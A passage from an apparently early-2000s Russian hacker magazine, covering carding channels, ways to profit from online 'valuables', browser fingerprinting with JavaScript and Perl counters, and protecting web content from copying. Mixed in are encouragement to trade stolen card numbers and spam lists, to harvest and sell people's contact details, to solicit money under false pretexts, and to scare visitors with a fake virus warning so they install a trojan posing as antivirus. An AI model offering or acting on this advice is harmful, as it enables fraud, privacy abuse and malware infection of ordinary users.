номерами в сети процветает! Есть и специальные IRC-каналы, на которых происходит обмен (да те же #cc ; #carding; #ccs от EFnet'а или #hacker; carding; #card; #CC; #carding от DALnet'а ). Пока Виза и MC очень котируются на большинстве собраний кардеров, так что ищи визовские карты! Заполучить номер валидной (или нет :)) карты ты можешь методом простого обмена на какую-нибудь ценность, например, спам-лист, на таком канале. А последний способ - открытие своего магазина в сети - мы уже обсуждали в прошлом Спеце, советую туда и заглянуть. Только я тебя предупредил, что все нелегальные операции с кредитными картами очень хорошо подпадают под статьи нашего УК! Как говорится, семь раз проверь, чтоб не купить себе путевку в места не столь отдаленные вместо новой железяки!


Спецвыпуск Xakep, номер #029, стр. 029-030-4, НАТУРАЛЬНОЕ ХОЗЯЙСТВО - выбери ценность Инета по душе

НАТУРАЛЬНОЕ ХОЗЯЙСТВО - выбери ценность Инета по душе

Vitalii or Vint

Спецвыпуск Xakep, номер #029, стр. 029-030-4

Халява

Через сеть можно получить не только виртуальные, но и вполне реальные ценности - вещи, диски. Для начала нужно найти инфу о свежей халяве. Это самый трудный и затратный процесс, но я тебе помогу! Вот некоторые сайты по "халявным" темам http://besthalyava.narod.ru, также есть специальная мэйл эха, посвященная халяве! Ловить так: отправь письмо на besthalyava-subscribe@yahoogroups.com и rus4money-subscribe@yahoogroups.com, ответь на пришедшее тебе письмо от Яхи, и все! Можешь обсуждать места проживания халявы! И пара советиков вдогонку. Русская халява явление редкое, но почти 100% приходящая, в отличие от буржуйской; отсюда вывод - видишь ссылку на русскую халяву, тыкай не задумываясь!

Мыло и ася

Каждый юзер аськи мечтает о коротком, легко запоминающемся номере, например 666 вместо 3274907452279448464 (не ругайтесь, если кого обидел :))! Если ты счастливый обладатель интересного номера, не особо нужного тебе, ты можешь его выменять на чего-нибудь более полезное, ведь многие просто фанатеют от простых имен. Так же дела обстоят и с мыльницами - короткое мыло удобней длинного по многим параметрам, все организации стараются забить себе мыло покороче и позвучней (как домен :)). Но на мыльном фронте дела обстоят несколько лучше, чем у тети Аси, есть множество мыльных серваков с приемлемыми доменами (mail.ru; yandex.ru; townnet.net), которые готовы дать тебе мыло на халяву. Одна проблема - на Яндексе и Рамблере уже все интересные имена забиты! Остались типа VasyaPypkinn12344@yandex.ru, а это не есть руль! Выход один - искать только открывшиеся серваки и забивать на них нормальные мыла (и не нормальные тоже!), а потом хвастать своим мылом linux@super.com! Желательно забивать имена на буржуйских серваках - есть надежда его загнать за веб-деньги. Поиск покупателя следует начинать с общеизвестных чатов и форумов (да хоть с chat.ru), затем через поисковики - ищешь сайты по словам типа "куплю E-mail адрес" на русских сайтах и "buy E-mail " на не наших, заканчивай поиск на конфах (все та же интернациональная яха).

Координаты

Этой ценностью ты вполне реально можешь завладеть, не прилагая особых усилий! А ценность-то вся состоит в номере аськи или мыле: аська или мыло известных людей или интересных девчонок! Поговорим сначала об использовании координат известных людей (надеюсь, про девчонок ты догадался :)). В Инете особенно интересуются мылами музыкантов, просто известных людей и "спонсоров". Также всегда интересны мыла (номера аськи), за которыми скрываются грамотные программисты, хакеры. Вот рассказываю, как тебе следует юзать и кому предлагать нашаренные тобой мыла. Музыкантские мыла ты, ессесно, будешь предлагать фанатам, но тут есть некоторые особенности: если мыло сдернуто с официального сайта музыканта, то тебя просто пошлют подалее, и если оно не валидное - тоже... При рекламе мыла учти направление музыки сего певуна! Не советую предлагать мыло Децла поклонникам металла. Мыла известных людей тоже можно использовать для своих нужд - предложить им свои услуги (например: "А давайте я вам сайтик нарисую"); если хорошо постараться, то можно влезть в его доверие и срубить энное количество вечнодеревянных! А про "спонсоров" я тоже не забыл, им мы будем слать писульки с просьбами об участии в покупке нового компа! Но следует писать какие-нибудь более жалостливые предлоги... Ну и последние в этой группе - программисты и хакеры, их мыла следует иметь в своем запасе для получения реальной помощи в компутерных вопросах! Ты всегда сможешь понтануться "своими" знаниями перед друзьями, девчонками, если будешь знать эти заветные мыла! А электронные адреса реальных девчонок следует выносить в особую категорию - особо нужных! Знакомясь с девчонками в Инете, ты оттачиваешь свое мастерство для реальной жизни. А собирая коллекцию асек (мыл) таких леди, ты усиливаешь свое положение в сети! Да и недавно подцепленная в сети девчонка может оказаться твоей соседкой, а значит, ваши отношения получат продолжение. Надеюсь, я тебя убедил в необходимости сбора мыл реальных людей? Тогда вот тебе лучшие способы: начинай свою миссию с посещения чатов и форумов, пиши в гостевухах объявы о знакомстве (не советую писать на каком-нибудь gay.com :)), выполнив сие не останавливайся! Следующим местом проживания благости служат эхи, начинай поиск с Яхи, список многих конф смотри выше. И напоследок подпишись на рассылку по интересующей теме! Подписаться можно на subscribe (мона и на mail.ru), для этого зайди на www.subscribe.ru или напиши письмо на subscribe@subscribe.ru, а в теле (в смысле письма!) набей help. Вот так ты получишь нужные тебе адреса девчонок! А про музыкантов и известных людей тебе следует внимательно изучать их сайты (но не вздумать тащить мыло, которое торчит на самом видном месте!) и читать между строк! Так ты можешь написать веб-мастеру сего сайта и выпросить нормальный мыл нужного чела, который он тебе доверит "по секрету" после нескольких веб-монет! Дерзай!


Спецвыпуск Xakep, номер #029, стр. 029-030-5, НАТУРАЛЬНОЕ ХОЗЯЙСТВО - выбери ценность Инета по душе

НАТУРАЛЬНОЕ ХОЗЯЙСТВО - выбери ценность Инета по душе

Vitalii or Vint

Спецвыпуск Xakep, номер #029, стр. 029-030-5

Злоключение

Как ты видишь, в сети полно разных ценных вещей, главное - уметь их видеть и использовать! Запомни, что тебе всегда охотней помогут, если ты предложишь к просьбе любую ценность! И знай, что в сети процветает меновая торговля, то есть, имея одну благость, ты всегда сможешь выменять все остальные! Особенно нужными считаются спам-листы, так что старайся выменять именно их. Еще считаются хорошим товаром номера кред, но очень часто именно на них и кидают, к тому же за них можно и угодить куда подальше! А сейчас перед тобой куча способов зарубания ценностей! Начинай, ибо дорогу осилит идущий (с)! Все траблы и флейм - мне на мыло.


Спецвыпуск Xakep, номер #029, стр. 029-034-1, ВЕБ-ШПИОНСТВО - добываем инфу о юзере

ВЕБ-ШПИОНСТВО - добываем инфу о юзере

Леха ББ aka Alexys

Спецвыпуск Xakep, номер #029, стр. 029-034-1

(alex-sun@mtu.ru)

Любопытство - великая вещь. А любопытство в сочетании с чешущимися руками и горящими глазами - вещь великая вдвойне. Любому владельцу мало-мальски раскрученного сайта интересно знать, кто с чем жалует - у кого какое разрешение, какой броузер, какая операционка. Ведь с такой инфой можно предположить наличие дырок в системе и тогда попытаться ими воспользоваться. Тем более, что айпишник вытащить таким образом до ужаса легко.

Методы сбора инфы о юзерах

Существует несколько методов для сбора данных о пользователях. Причем чистый HTML тут не поможет - он не обладает такими полномочиями. А вот если к этому хозяйству прилопатить Java Script и CGI, то можно проводить безопросные опросы о том, кто чем пользуется. Если постараться еще немного, то можно узнать такую инфу о многих юзерах и провести статистические вычисления, которые помогут понять, что можно использовать при разработке и создании сайта.

Возможность применения какого-либо метода зависит от возможностей хостинга, от умения программить и от методов мышления. Самый простой метод может быть самым неудобным и бесполезным. А именно - просто на сайте написать просьбу посылать информацию о системе тех юзеров, которые попадают на сайт. Это самый идиотский вариант сбора инфы, который можно вообще придумать :). Но пока CGI не получили распространения, только так и можно было узнать. Ведь зачастую юзеры сами понятия не имеют, что у них за система, а некоторые даже не знают, что такое разрешение! А ведь это тоже немаловажный параметр, если ты, к примеру, делаешь упор на дизайн сайта. Ведь сайт, сделанный под 640х480, будет просто нереально смотреть под 1024х768 и большим. Но кто писать-то захочет? Найдется, может, пара добровольцев, которым больше заняться нечем, но не более того. Большинство пошлет такого веб-мастера на х... или просто забьет на просьбу. А знать-то все-таки хочется. Встает вопрос - как?

Узнавание данных о юзере с помощью Java Script

При помощи Java Script можно многое узнать о юзере. Только вот вести статистику никакую не получится, ибо чистый Java Script не может ничего записывать в файлы, которые лежат на сервере. И не удивительно это, ведь Java Script - язык броузера. Но такие вещи, как тип броузера, текущая кодировка броузера и разрешение экрана определяются на ура. А это уже не мало, если дизайну сайта уделяется не последнее внимание.

При использовании Java Script'а надо вспомнить, какие методы возвращают значения этих самых параметров, и придать эти значения переменным. При помощи JS можно немного удивить юзера, зашедшего на сайт, выдав ему небольшую подборку узнанных о его системе сведений.

<html>

<head>

<SCRIPT LANGUAGE="JavaScript" TYPE="text/javascript">

<!-- //

var

// переменная для определения кодировки

ch=document.charset;

// тип броузера

ua=navigator.userAgent;

// версия броузера

v=navigator.appVersion.substring(0,1);

// операционка

os = navigator.appVersion.substring(27,38);

// разрешение по горизонтали

sw = screen.width;

// разрешение по вертикали

sh = screen.height;


Спецвыпуск Xakep, номер #029, стр. 029-034-2, ВЕБ-ШПИОНСТВО - добываем инфу о юзере

ВЕБ-ШПИОНСТВО - добываем инфу о юзере

Леха ББ aka Alexys

Спецвыпуск Xakep, номер #029, стр. 029-034-2

// поддержка Java Script

isjava = (navigator.javaEnabled() ? "Yes" : "No");

// определение глубины цвета

scd=screen.colorDepth;

// текущая просматриваемая страница

page=escape(window.location.href);

// -->

</SCRIPT>

</head>

<body>

<h2>О тебе известно вот что:</h2>

<script>

document.write('кодировка - ' + ch + '<br> броузер - ' + ua + '<br> ось - ' + os + ',<br>разрешение экрана ' + sw + 'x' + sh + '<br> Поддержка Java Script (Yes/No) - ' + isjava + '<br> Глубина цвета (бит) - ' + scd + '<br>а смотришь ты страницу ' + page)

</script>

</body>

</html>

В результате юзер натолкнется на такую страницу, где ему как по полочкам будут выложены сведения о его системе.

Под таким делом можно написать, что это стало известным по причине каких-нибудь вирусов, а спасти от них может только программа, которую можно скачать с сайта. Ниже располагается линка на эту программу, которая будет не антивирусом или файрволлом, а самым обычным трояном. Наверняка не один юзер клюнет на это - скачает и установит троян. А уж как этим воспользоваться, не мне тебя учить.

Определение данных о юзере только с помощью Java Script'а можно применять для таких случаев, когда надо загрузить нужный css-файл в зависимости от разрешения экрана юзера, попросить во всплывающем окне о смене броузера, если сайт оптимизирован под другой, ну и т.п. Но на базе Java Script'а можно вести статистику, но для этого понадобится еще и CGI.

Возможности перла для сбора данных

В отличие от Java Script'а, который является языком броузера, скрипты на Perl'е, как и на любом другом языке для написания CGI-шников, исполняются на сервере. Вроде бы ничего и определить нельзя. Это почти так, но все же вместе с запросом передаются некоторые параметры и на сервер. А их никто не мешает определить. Причем эти данные определятся стопудово - тут не помогут никакие резатели скриптов и аплетов, которыми народ стал пользоваться. Если не будет запроса, то и ответа не будет :). От этого никуда не денешься. Ниже приведу фрагмент скрипта на перле, который определяет некоторые данные о юзере.

print "<h3>Данные о юзере, определенные с помощью CGI</h3>\n";

print "Тип броузера: $ENV{'HTTP_USER_AGENT'}\n";

print "<br>\n";

print "Айпишник обратившегося к скрипту: $ENV{'REMOTE_ADDR'}\n";

У CGI, конечно, поменьше возможностей для определения сведений о юзере. Но такие методы, как использование только Java Script или только CGI, никакой нормальной картины дать не могут - все данные известны только в тот момент, когда юзер обратился к странице. Причем только в момент обращения. Конечно, CGI-шник можно немного продлить и добавить запись в файл 2-х определяемых величин, но это почти никак не поможет. Знание только броузера мало чем поможет.

У каждого из вышеописанных методов есть свои достоинства и недостатки. Java Script может много чего определить, но ничего не может записать. Следовательно, ни о какой статистике речи просто нет. CGI-шный метод может вести статистику, но только слишком она маленькая получается. Сам собой напрашивается вопрос, можно ли совместить эти 2 способа. А если можно, то как.


Спецвыпуск Xakep, номер #029, стр. 029-034-3, ВЕБ-ШПИОНСТВО - добываем инфу о юзере

ВЕБ-ШПИОНСТВО - добываем инфу о юзере

Леха ББ aka Alexys

Спецвыпуск Xakep, номер #029, стр. 029-034-3

CGI + Java Script = полная картина о юзерах

Операционки, броузеры, разрешения и другие параметры встречаются у разных юзеров в разных сочетаниях. Например, один сидит под UNIX'ом, юзает Netscape, а другой сидит под двухтысячными, но при этом тоже пользуется нетскейпом. Знать в отдельности, что у кого и под чем, - не очень интересное занятие. Куда интереснее знать в целом, какой броузер более популярный, какое разрешение. Такие сведения можно получить только ведя статистический учет. Для этого надо определять всевозможные параметры и записывать их в файл. А потом натравливается какая-нибудь прога и высчитывает, какие варианты сколько раз встречались. Одним словом, анализирует. Как проводить статанализы - придумаешь сам. Это уже зависит от того, что ты конкретно захочешь знать. А вот как собрать сведения, которые надо обработать, уже более интересная задача.

Выше было сказано, что было бы неплохо совместить возможности CGI и Java Script. Это сделать можно, но надо иметь представление о том, как скрипту передаются параметры и как они обрабатываются (во 2-ом СПЕЦе этому посвящена статья). Самый простой вариант, который используется в Инете повсюду, - использование картинок. И счетчики, и баннерные сетки ведут такую статистику. Только баннерные сетки отслеживают клики, переходы и прочую дрянь, с которой разбираться можно не один день. Причем результат разбирательств не всегда будет полезным. Да и не нужно тебе это, если не хочешь создать свою баннерную сеть.

Картинка отображается не прямым указанием пути к ней, а указывается адрес скрипта, в результате работы которого получается картинка. Только этот путь указывается с параметрами. Для сбора данных понадобится: Java Script'овый кусок, запихиваемый на страницы, - 1 штука; перловый скрипт для отображения картинки и сохранения переданных данных - 1 штука; скрипт для подсчета и учета - 1 штука.

Тот текст, который надо будет вставлять на страницы как 2 капли воды похож на код таких счетчиков, как на mail.ru, one.ru и другие. Главное разобраться, что и куда в этих кодах передается. Сейчас попробую в этом помочь. Ниже для примера приведу один готовый код, к которому позже будет написана сохранялка разведданных. Он будет передавать те параметры, которые определялись чисто Java Script'овым методом в примере выше. Этот код будет вставляться во все страницы (ну или в те, с которых нужно собрать статистику). Чтобы картинка могла бы быть полезной, пусть она заодно будет ссылкой, ведущей, например, на главную страницу сайта.

<!--YOUR COUNTER-->

<a target=_top href="http://winfo.org">

<script language="javascript">

<!--

var

//

ch=document.charset;

ua = navigator.userAgent;

v = navigator.appVersion.substring(0,3);

os = navigator.appVersion.substring(27,38);

sw = screen.width;

sh = screen.height;

resol = sw + 'x' + sh;

isjava = (navigator.javaEnabled() ? "Yes" : "No");


Спецвыпуск Xakep, номер #029, стр. 029-034-4, ВЕБ-ШПИОНСТВО - добываем инфу о юзере

ВЕБ-ШПИОНСТВО - добываем инфу о юзере

Леха ББ aka Alexys

Спецвыпуск Xakep, номер #029, стр. 029-034-4

scd = screen.colorDepth;

page = escape(window.location.href);

document.write("<img src=\" http://winfo.org/cgi-bin/stat.pl?",

"ch=" + ch + "&ua=" + ua + "&v=" + v + "&resol=" + resol + "&os=" + os + "&isjava=" + isjava + "&scd=" + scd + "&page=" + page + "\"", width=25 height=15 " + "border=0>");

//

-->

</script>

<noscript>

<img src=" http://winfo.org/cgi-bin/stat.pl?js=nojs"

width=25 height=15 border=0>

</noscript>

</a>

<!--YOUR COUNTER-->

Передача параметров, определенных кодом выше, осуществляется при помощи Java Script'а между тэнами <script>...</script>. Параметры, определенные с помощью JS, передаются CGI-шнику в тэге <img src ...>. Передаваемые параметры отделяются от имени скрипта знаком вопроса (?), а между собой разделяются амперсандом (&). Передаваемые параметры выглядят примерно так:

windows-1251; Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0); 4.0; 1024x768; Windows NT; Yes; 32; file:///D:/Testing/browser.html.

Сведения о разрешении экрана передаются в удобочитаемой форме типа "1024х768". На мой взгляд, лучше всего передавать как один параметр разрешение по горизонтали и вертикали, ибо так просто удобнее их видеть без дальнейшей обработки. Все пробелы, которые встретились в значениях параметров, заменены знаком %. Это надо будет учесть при написании скрипта обработчика.

Если JS не работает (отключен, не установлен), то тогда ничего не будет передано, ибо ничего не определится. А для того чтобы узнать, что у кого-то JS не работает, в тэгах <noscript>...</noscript> скрипту передается соответствующая информация (stat.pl?js=nojs). Кроме того, содержимое тэгов <noscript>...</noscript> позволит заполнить место, которое могло бы быть пустым, картинкой.

JS-код написан. Теперь надо браться за cgi-шник. В папке cgi-bin надо сделать файл stat.pl. В его задачи входит вывод картинки, обработка и запись принятых параметров в файл. Для того чтобы скрипт выводил картинку, по идее надо разбираться с форматом gif или jpeg, но это не самое приятное занятие. Тем более, если делаешь не счетчик, который будет показывать количество уников, хитов и хостов, то этого можно и избежать. Намного проще будет сделать картинку, которую скрипт будет считывать и потом выдавать. Отличие такого скрипта будет в заголовке. Вместо привычного "print "Content-type: text/html;charset=windows-1251\n\n";", который нужен для выдачи в ответе html-страниц, будет строка "print "Content-type: image/gif\n\n";". Этот заголовок будет сообщать броузеру, что результатом работы скрипта является динамический gif-файл. Кроме того, понадобится еще процедура FormInput. Ее исходник и описалово опубликованы в ХАКЕР СПЕЦ 02(27) "ПАГА-РОБОТ". Кроме того, ее можно скачать отсюда: http://winfo.org/down/values.zip. Эта процедура понадобится для обработки полученных параметров и их последующей записи в файл.

Если скрипт будет работать на *nix-системах, то считывание и выдача содержимого файла будет такой же, как и при работе с текстовыми файлами. Под виндами вместе с символом новой строки \n появятся лишние символы возврата каретки \r. Понятно дело, все будет выглядеть не так, как надо. Во избежание таких глюков надо указать, что файл должен считываться как бинарный. Запусти Photoshop (ну или чем ты рисуешь) и нарисуй небольшую картинку. После чего сохрани ее в папке html как p1.gif (имя может быть любое, просто такое используется в примере). Только делай картинку не стандартно используемых счетчиками размера (88х31, 120х60, 100х100), а то некоторые резатели, типа Outpost'а, будут вырезать всю часть кода. А значит, и статистика собираться не будет.


Спецвыпуск Xakep, номер #029, стр. 029-034-5, ВЕБ-ШПИОНСТВО - добываем инфу о юзере

ВЕБ-ШПИОНСТВО - добываем инфу о юзере

Леха ББ aka Alexys

Спецвыпуск Xakep, номер #029, стр. 029-034-5

$maindir="../html/";

#рабочая папка

$picfile=$maindir.'p1.gif';

#путь к графическому файлу, который будет выдан броузеру

#--вывод картинки скриптом

open(AA1, $picfile);

#открытие файла

binmode(AA1);

binmode (AA1);

#это для Windows - указание на бинарность файла

@picture=<AA1>;

#считывание файла в массив @picture

close(AA1);

#закрытие файла

foreach(@picture)

{print $_;}

Если в броузере ввести адрес скрипта или открыть html-страницу, содержащую описанный выше JS-код, то ты увидишь созданную картинку. Уже полдела сделано - что-то отображается. Осталось сделать обработку и запись полученных параметров.

#--обработка и запись параметров в файл

$q=$ENV{'QUERY_STRING'};

#передаваемая скрипту строка параметров

$statfile=$maindir.'stati.txt';

#файл, куда будут кидаться все полученные данные

open(AA2, ">>$statfile");

#открытие файла для записи в конец (дозаписи)

if ($q ne "nojs")

{

$q=~s/%/ /g;

#замена знака % пробелами

$ch=$input{'ch'};

#кодировка

$ua=$input{'ua'};

#тип броузера

$v=$input{'v'};

#версия броузера

$resol=$input{'resol'};

#разрешение экрана

$os=$input{'os'};

#операционка

$isjava=$input{'isjava'};

#работает ли Java Script

$scd=$input{'scd'};

#глубина цвета, бит

$page=$input{'page'};

#адрес просматриваемой страницы

#запись через разделитель ";;" сведений о кодировке, типе броузера, его версии, разрешении экрана, операционке, наличии поддержки JS, глубины цвета и адреса просматриваемой страницы

print AA2 "$ch;;$ua;;$v;;$resol;;$os;;$isjava;;$scd;;$page;;\n";

}

else

{

print AA2 "Ничего не определено\n";

}

close(AA2); #закрытие файла с записанными данными

exit;

Система готова на 99%. Остается для удобства и автоматизации написать скрипт для обработки полученных данных - сортировки, подсчета и т.п. Но это уже выходит за рамки статьи. Тем более, это не так трудно, как сбор статистики, так что справишься. Кстати, можешь замутить еще и запись айпишника в файл статистики - будешь считать постоянных клиентов :).

Кто и как это использует?

Сбор сведений о системе пользователей используется в счетчиках, баннерах, партнерских программах. Отчасти это помогает выяснить, не накручивает ли кто показы и клики. Ведь не может же зайти на один сайт в течение 5 минут 1000 человек с неизвестными броузерами :). Из собранных мной в свое время таких данных можно сказать, что абсолютное большинство народа сидит под виндами (98%), юзает експлореры (92%), самые популярные разрешения - 1024х768 (43%), 800х600 (39%). Основываясь на этих данных, можно сказать, что если оптимизировать сайт под разрешение 800х600 для просмотра в ИЕ - наиболее выгодный метод. Ведь в IE есть понятная только ему поддержка некоторых элементов CSS, которые либо как-то криво, либо вообще никак не отобразятся в других броузерах. Я не хочу обидеть пользователей Netscape'а, но их ведь правда мало. Суровы законы реальности - большинство обычно кладет на меньшинство.


Спецвыпуск Xakep, номер #029, стр. 029-034-6, ВЕБ-ШПИОНСТВО - добываем инфу о юзере

ВЕБ-ШПИОНСТВО - добываем инфу о юзере

Леха ББ aka Alexys

Спецвыпуск Xakep, номер #029, стр. 029-034-6

Такой замечательный броузер, как Opera, может попортить всю статистику. Он может представляться серваку одним из нескольких имен, которые предлагает выбрать. Хотя в случае с Оперой подстава не так страшна - в этом броузере и в експлорере все смотрится настолько похоже, что даже придраться не к чему. Он и css замечательно понимает, начиная с седьмой версии.

В статье приведен неполный список параметров, которые можно определить. Их полное перечисление можно продолжать очень долго. Можно было вспомнить про cookies, с помощью которых можно определить дату предыдущего визита, если такое имело место быть. Только оно не к чему. Если надо что-то посмотреть, то рекомендую просто посмотреть на текст готовых счетчиков - там можно много полезных фишек найти. Зачем изобретать велосипед? Ага, вот и я думаю. Так что не теряй времени - разбирайся и пиши. Тем более, это уже относится к web-разработкам, а за такие вещи платятся неплохие денежки!


Спецвыпуск Xakep, номер #029, стр. 029-038-1, СКАЖИ НЕТ ПЛАГИАТУ - защищаем тексты и картинки в сети

СКАЖИ НЕТ ПЛАГИАТУ - защищаем тексты и картинки в сети

Леха ББ aka Alexys

Спецвыпуск Xakep, номер #029, стр. 029-038-1

(alex-sun@mtu.ru)

Сколько раз при заходе на сайт тебя не покидало ощущение, что ты это уже где-то видел? Наверняка не раз. Очень многие владельцы сайтов просто нагло тырят контент и идеи дизайна и кода один у другого, зачастую не разбираясь, что к чему. Из-за этого нередко налицо потеря качества. Очень обидно начинающим веб-мастерам, которые хотят сделать сайт уникальным, когда обнаруживают свой авторский материал на 10 и более других сайтах, причем обычно авторство не указывается. Сразу же начинаешь возмущаться, типа, какого х... хакера моя статья висит у этого муд... мудрого плагиатора? Только ничего не поделаешь - информация на сайте является общедоступной. Но все-таки есть методы наложить свои копирайты и на текст, и на графику.

Объекты особого внимания

В вебе основными объектами, которые быстро попадают на кучу сайтов, являются текстовая информация, графика и дизайн. Почему-то варез, крэки и порно не так часто привлекают внимание распространителей. А жаль :). Неплохо было бы, если бы варезные сайты расплодились побольше, причем так, чтобы у каждого сайта был свой файловый архив, а не простое указание одних и тех же ссылок на все файлы. Но такое хрен 2 произойдет, ведь программы занимают намного больше места, чем текст и графика. А трафик и пропускная способность канала обычно сильно ограничены. Вот и тырят то, что поменьше, чтобы сделать побольше страниц, а в результате поднять посещаемость и количество баннеропоказов.

Не считается уголовно наказуемым, если чужая информация используется в ознакомительных целях и не преследует коммерческой выгоды. Но ведь баннеропоказы потом продаются, а значит, выгода есть. Только не твоя она. Чтобы можно было наехать на чела, который стянул твой контент, надо этот контент как-то пометить так, чтобы это не было сильно заметно визуально, а подтвердить свою правоту после этого было можно. Также можно закодировать инфу так, чтобы на ее раскодирование ушло больше сил, чем на создание аналогичного материала.

Правка текстовых файлов

С текстовыми файлами особо ничего и нельзя поделать. Но чтобы хотя бы самому можно было его узнать и попытаться доказать свое авторство, можно позаменять некоторые символы. Пусть тот текст, который ты хочешь немного подзащитить, написан русскими буквами по-русски. Но ведь некоторые русские буквы по написанию совпадают с латинскими. Почему бы их не заменить друг другом? В любом текстовом редакторе можно провести подобную замену. А если не полениться, то можно написать небольшую прогу, которая будет сама менять все нужные символы. Если обработанный таким образом текст вставить в Word, то проверка орфографии покажет ошибки едва ли не во всех словах. Мелочь конечно, но лучше, чем ничего.

Причины для защиты HTML-кода

Основные требования к хорошему сайту - информативность, уникальность и хороший дизайн. Уникальности можно добиться только тогда, когда информация с этого сайта не попадает на другие и не копируется с других, а также пока дизайн сайта остается оригинальным. Многие бездари, которые выучили несколько тэгов, кинулись делать сайты. У самих ничего хорошего обычно не выходит, ибо мозги пока не могут сгенерить нормальные идеи, а вот свистнуть идеи и код им под силу. Залезут они на понравившийся сайт, скачают несколько страниц, разберут их по косточкам. Именно так и получаются клоны.


Спецвыпуск Xakep, номер #029, стр. 029-038-2, СКАЖИ НЕТ ПЛАГИАТУ - защищаем тексты и картинки в сети

СКАЖИ НЕТ ПЛАГИАТУ - защищаем тексты и картинки в сети

Леха ББ aka Alexys

Спецвыпуск Xakep, номер #029, стр. 029-038-2

Дизайн, как и контент, должен охраняться. Но как это сделать, если HTML - это open-source. Наверно во всех броузерах есть пункт "Просмотреть в виде HTML" или что-нибудь в таком духе. Получается, что, делая сайт, ты его бесплатно даришь всем подряд, а на создание реального дизайна у тебя наверняка ушел не один день работы. Надо бы защитить свое детище.

Существует несколько программ (о них ниже), которые проводят некоторые извращения над HTML-кодом, кодируя его до неузнаваемости. В результате получается текст в непонятной кодировке (честно говоря, там даже после пива не поймешь ничего), который отображается нормально только как результат работы Java Script'а. Один недостаток этих программ - для нормального отображения их нужно, чтобы Java Script был включен. Но, как показывает статистика, таких юзеров абсолютное большинство. Так что беспокоиться особо не о чем. Конечно, стопроцентную гарантию от открытия кода дать не может никто, но открытие будет очень сильно затруднено. Особенно потому, что в кодированной информации содержится еще какая-то часть мусора, не влияющего на отображения страницы. Пойди разберись, что к чему там. Не факт, что на создание такого же дизайна своими руками уйдет больше времени. Тем более опытный веб-дизайнер не будет лазить по сайтам в поисках идей - он сам придумает не хуже. А вот бездари даже нормальной копии не смогут сделать. Так что перейдем к рассмотрению методов защиты кода.

Защита содержания HTML-страниц

Наиболее простым вариантом сохранения контента на сайте (кстати сказать, не слишком эффективным) является блокирование нажатия правой кнопки мышки. Это реально защита от дурака, чтобы тот не смог ничего скопировать. Но ведь все равно можно сохранить страницу и посмотреть на скачанные файлы. Метод настолько бесполезный, что его можно даже не рассматривать.

Куда более интересным является результат защиты кода такими программами, как HTML Guard, HTML Protector, Secure HTML Lock и HTML Compress. Все эти программы (кроме HTML Compress) исковеркивают HTML-код до неузнаваемости, а страница после обработки ими продолжает выглядеть абсолютно так же. Только размер немного увеличивается. HTML-Compress не криптует HTML-код, а просто уменьшает объем страницы. Это основано на удалении двойных пробелов, удалении комментариев и т.п. HTML-код остается открытым, только вот читать его становится не очень удобно.

Софт для скрытия HTML-кода

HTML Guard - лучшая, на мой взгляд, программа для шифрования HTML-кода. Правда, она shareware, но кряки к ней есть :).

Сначала выбираешь, какие файлы тебе надо запротектить. Во вкладке Output не меняй ничего - по дефолту там настроено создавать bak-файлы в той же папке, где будут меняться файлы. В опции Source Code устанавливается, что будет написано в тэгах <noscript>, например, можно написать "Включи Java Script, дурень". Здесь же можно сказать проге создавать кучу пустых линий в коде, дабы еще больше запутать пытающихся просмотреть код. В менюшке Images/Texts можно отключить нажатие правой кнопки мышки. При ее нажатии всплывет alert с мессагой, которую можно здесь же вбить или воспользоваться готовой. Разработчики были явно с чувством юмора, написав в одном из вариантов "Why don't you create a web page by yourself?" (Почему бы тебе не сделать страницу самому?). Также здесь можно отключить возможность выделения текста и распечатывания страницы. После выбора настроек шифрования надо нажать кнопку Protect Files, и тогда выбранные файлы станут защищенными.


Спецвыпуск Xakep, номер #029, стр. 029-038-3, СКАЖИ НЕТ ПЛАГИАТУ - защищаем тексты и картинки в сети

СКАЖИ НЕТ ПЛАГИАТУ - защищаем тексты и картинки в сети

Леха ББ aka Alexys

Спецвыпуск Xakep, номер #029, стр. 029-038-3

Вот так легко и быстро можно защитить свои многочасовые старания.

Другие программы для скрытия кода (Secure HTML Lock и HTML Protector) не так хороши, как HTML Guard. Обработанную HTML Protector'ом страницу не получается просмотреть Explorer'ом, который вечно выдает ошибку и вырубается. Не думаю, что такое поведение столь популярного броузера заставит людей еще раз явиться на твой сайт, каким бы информативным он ни был. Хотя это можно как-нибудь и использовать :).

Программа Secure HTML Lock тоже показала себя не с лучшей стороны. В страницы она вживляет упоминание о себе любимой. На хрен делать рекламу кому-то еще? Обойдутся :). У нее есть свои достоинства, но это не относится к теме этой статьи.

Защита графики от использования на других сайтах

После того, как были защищены HTML-страницы, надо бы вспомнить и о графике. И неважно, что картинки с сайта стало трудно вытащить. Все равно можно, в отличие от текста. И картинки не запаролишь, и не закодируешь, чтобы их не свистнули. Иначе их просто видеть никто не будет. Даже если картинка является результатом работы скрипта, ее все равно можно сохранить. На крайняк воспользовавшись Print Screen'ом. Есть решение вопроса, как можно вставить копирайты в картинки. Знаешь, самый первопроверяемый параметр бумажных денег? Это водяные знаки, или watermark'и на инглише. Их ведь можно использовать не только на бумаге, но и в графике. Надо только придумать, как их сделать.

Watermark - способ наложения копирайтов на графику

Watermark - это небольшой объект, наносимый на картинку, который не мешает просмотру, т.е. он должен как бы сливаться с картинкой. Для облегчения этого процесса даже были выпущены какие-то программы, но все их действия могут быть выполнены в Photoshop'е (желательно 7, но должны подойти и более старые версии), лучше которого я пока не видел ни одной программы для работы с растровой графикой.

Для разбирательства с принципом создания watermark'ов понадобится картинка, которую надо защитить. В качестве примера взят сгенеренный в Terragen'е пейзажик. Открой его в фотошопе и заресайзь до нужных размеров.

Чтобы сделать watermark поинтереснее, можно нарисовать какую-нибудь фигуру, в которую будет вписан текст копирайта. Но это уже будет зависеть от твоей фантазии. Главное - не дать своему самолюбию сделать копирайт очень большого размера. Выбери Type Tool (дословно "тулза для печати") и вбей инфу, которая будет указывать на твое авторство. Это может быть твое имя, e-mail, URL сайта и т.п. После чего немного поизвращайся с получившейся надписью - сделай ей ресайз, повращай, покрути и расположи в том месте, где ты хочешь оставить свой копирайт.


Спецвыпуск Xakep, номер #029, стр. 029-038-4, СКАЖИ НЕТ ПЛАГИАТУ - защищаем тексты и картинки в сети

СКАЖИ НЕТ ПЛАГИАТУ - защищаем тексты и картинки в сети

Леха ББ aka Alexys

Спецвыпуск Xakep, номер #029, стр. 029-038-4

